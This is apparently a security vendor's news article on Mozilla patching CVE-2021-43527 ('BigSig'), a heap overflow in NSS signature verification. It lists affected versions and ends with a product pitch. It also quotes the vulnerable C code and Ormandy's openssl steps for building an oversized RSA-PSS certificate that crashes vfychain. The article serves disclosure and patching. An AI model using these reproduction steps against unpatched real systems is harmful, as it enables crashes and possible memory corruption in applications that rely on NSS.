You are currently viewing Mozilla Fixes Critical Vulnerability In Cryptographic Libraries

Mozilla Fixes Critical Vulnerability In Cryptographic Libraries

Mozilla has recently fixed a critical memory corruption vulnerability affecting its cross-platform Network Security Services (NSS) set of cryptographic libraries.

Network Security Services (NSS) is an open-source implementation of the crypto libraries used by AOL, Red Hat, Google, and other companies to support cross-platform development of security-enabled client and server applications. Applications using NSS support many network security standards like SSL v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, and X.509 v3 certificates.

The flaw was discovered and reported by Google’s Project Zero member, Tavis Ormandy, who dubbed the vulnerability, BigSig. It has since been tracked as CVE-2021-43527.

The security vulnerability exists in the way NSS handles DER-encoded DSA or RSA-PSS signatures, leading to a heap overflow vulnerability. When a DSA or RSA-PSS digital signature encoded using the DER binary format is verified, no bounds are checked done on the length of the signature. “sig and key are arbitrary-length, attacker-controlled blobs,” as said by Ormandy. “The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.”

The vulnerable part of the code for RSA-PSS is given below:

case rsaPssKey:
   sigLen = SECKEY_SignatureLen(key);
   if (sigLen == 0) {
       /* error set by SECKEY_SignatureLen */
       rv = SECFailure;

   if (sig->len != sigLen) {
       rv = SECFailure;

   PORT_Memcpy(cx->u.buffer, sig->data, sigLen);


The steps to reproduce as given by Ormandy are:
We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj.
$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key
Generate a self-signed certificate from that key
$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer
Verify it with NSS
$ vfychain -a bigsig.cer
Segmentation fault

Tavis has also published a detailed write-up of the vulnerability available here.

Affected Versions

  • NSS versions before 3.73
  • NSS ESR versions before 3.68.1

Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.

Mozilla Security Advisory

Mozilla also added a note stating that the critical vulnerability in cryptographic libraries does not impact Mozilla Firefox. Email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution, and Evince, are believed to be impacted.


Mozilla has patched this vulnerability in NSS 3.73.0. Vendors that distribute NSS in their products are advised to update or backport the patch.

SanerNow VM and SanerNow PM detect this vulnerability and automatically fix them by applying security updates. Use SanerNow and keep your systems updated and secure.

0 0 votes
Article Rating
Notify of

Inline Feedbacks
View all comments